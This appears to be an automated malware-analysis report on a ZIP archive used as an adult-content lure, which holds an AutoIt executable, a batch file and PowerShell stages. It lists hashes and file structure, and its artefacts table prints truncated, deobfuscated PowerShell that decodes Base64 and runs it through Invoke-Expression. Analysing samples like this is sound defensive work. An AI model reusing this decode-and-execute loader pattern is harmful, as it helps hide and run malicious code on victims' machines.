Malicious

OnlyFans- Uma North.zip | ZIP Archive | MD5: a9d64ae6c494a5fe4e19e7ed4dc278c1 | Size: 566.41 KB | application/zip

Zip Archive
Executable
AutoIt
PE (Portable Executable)
PowerShell
DeObfuscated

Characteristics
MD5: a9d64ae6c494a5fe4e19e7ed4dc278c1
SHA-1: 78b55eb6c07f473287131a74ff4664013aa35648
SHA-256: 47e657db8b338bc174dcce4d2d0b3fb6b1dd18fc1fa7b6a9e2e3863d963939c5
SHA-384: 1f021849b46af7f2681db05bfd700b1b2edb05786c3ce6194d6cabfd35e62a3d67b7bc06967c57aab4acd39c1fb7e365
SHA-512: e402a617b50639d6b98f3fdea487b556d58ece9fa9a23501cbd964b575f98afcd5cbbf43075efe20ca918ae142b8e63af5ac26640b85842ee02346fc8a857740
SSDeep: 12288:Pi3Stk9Bxv6RYb7QgZXNm7Mel1B6z6zItzlnOPzZwo:PiiyliRiZ+trB6PBnOPVwo
TLSH: 47C423B077D98877C1D09AB4C761005CDED60933B4997293CEB1A6FA19F824CB29E3D9
File Structure
OnlyFans- Uma North.zip
Zip Archive
Executable
AutoIt
PE (Portable Executable)
PowerShell
DeObfuscated
Malicious
OnlyFans- Uma North
Malicious
ReadmeHere
Malicious
xxTorrentCoverbooks435
Archive Entry
Executable
AutoIt
PE (Portable Executable)
Win 64 Exe
x64
Structure
  DosHeader
  PE Header
  Optional Header (x64)
  Section Headers
    .text
    .rdata
    .data
    .pdata
    .rsrc
    .reloc
  Resources
    RT_ICON
      ID:0001
        ID:2057
      ID:0002
        ID:2057
      ID:0003
        ID:2057
      ID:0004
        ID:2057
      ID:0005
        ID:2057
      ID:0006
        ID:2057
      ID:0007
        ID:2057
      ID:0008
        ID:2057
      ID:0009
        ID:2057
      ID:000A
        ID:2057
      ID:000B
        ID:2057
      ID:000C
        ID:2057
      ID:000D
        ID:2057
    RT_MENU
      ID:00A6
        ID:2057
    RT_DIALOG
      ID:03E8
        ID:2057
    RT_STRING
      ID:0007
        ID:2057
      ID:0008
        ID:2057
      ID:0009
        ID:2057
      ID:000A
        ID:2057
      ID:000B
        ID:2057
      ID:000C
        ID:2057
      ID:0139
        ID:2057
    RT_GROUP_CURSOR (4)
      ID:0063
        ID:2057
      ID:00A2
        ID:2057
      ID:00A4
        ID:2057
      ID:00A9
        ID:2057
    RT_VERSION
      ID:0001
        ID:2057
    RT_MANIFEST
      ID:0001
        ID:1033
xxTorrentCoverbooks435.bat
Archive Entry
xxxTorrentCoverbooks435
Archive Entry
PowerShell
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Contains Base64 Block
Base64 Block
Malicious
[Base64-Block]
Base64 Block
PowerShell
DeObfuscated
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
Artefacts
Name | Value
Deobfuscated PowerShell | oding]::unicode.getstring ([Convert]::"FromBase64String"($encodedScript)) Invoke-Expression $decodedScript $encodedScript = "JABiAGEAcwBlADYANAB"
Deobfuscated PowerShell | ript "=" "[System.Text.Encoding]::Unicode.GetString" ([Convert]::"FromBase64String"($encodedScript)) Invoke-Expression $decodedScript $encodedScript
Deobfuscated PowerShell | qaaqbvag4a $decodedscript = [system.text.encoding]::unicode.getstring([system.convert]::frombase64string($encodedscript)) invoke-expression $decode
Deobfuscated PowerShell | qaaqbvag4a $decodedscript = [Encoding]::"unicode"."getstring"([Convert]::"frombase64string"($encodedscript)) Invoke-Expression $decode
Deobfuscated PowerShell | odedscript "=" "[System.Text.Encoding]::Unicode.GetString" ([Convert]::"FromBase64String"($encodedScript)) Invoke-Expression $decodedScript $encod
Deobfuscated PowerShell | dedscript "=" "[System.Text.Encoding]::Unicode.GetString" ([Convert]::"FromBase64String"($encodedScript)) Invoke-Expression $decodedScript $en
Deobfuscated PowerShell | wpubwhuzm5rzg5hywqiciagicagicagicagih0kicagicagicbdciagicb9cl0kj0a7 invoke-expression ([system.text.encoding]::utf8.getstring([system.convert]::from
Deobfuscated PowerShell | wpubwhuzm5rzg5hywqiciagicagicagicagih0kicagicagicbdciagicb9cl0kj0a7 Invoke-Expression ([Encoding]::"utf8"."getstring"([Convert]::"from"))
Deobfuscated PowerShell | zablagmacgb5ahaadablagqargb1ag4aywb0agkabwbuaa== $decodedscript = [system.text.encoding]::unicode.getstring([system.convert]::frombase64string($enco
Deobfuscated PowerShell | zablagmacgb5ahaadablagqargb1ag4aywb0agkabwbuaa== $decodedscript = [Encoding]::"unicode"."getstring"([Convert]::"frombase64string"($enco))
Deobfuscated PowerShell | dedscript Invoke-Expression $decodedScript Start-Job -ScriptBlock your-lastfunction
Deobfuscated PowerShell | dedscript Invoke-Expression $decodedScript Start-Job -ScriptBlock "your-lastfunction"
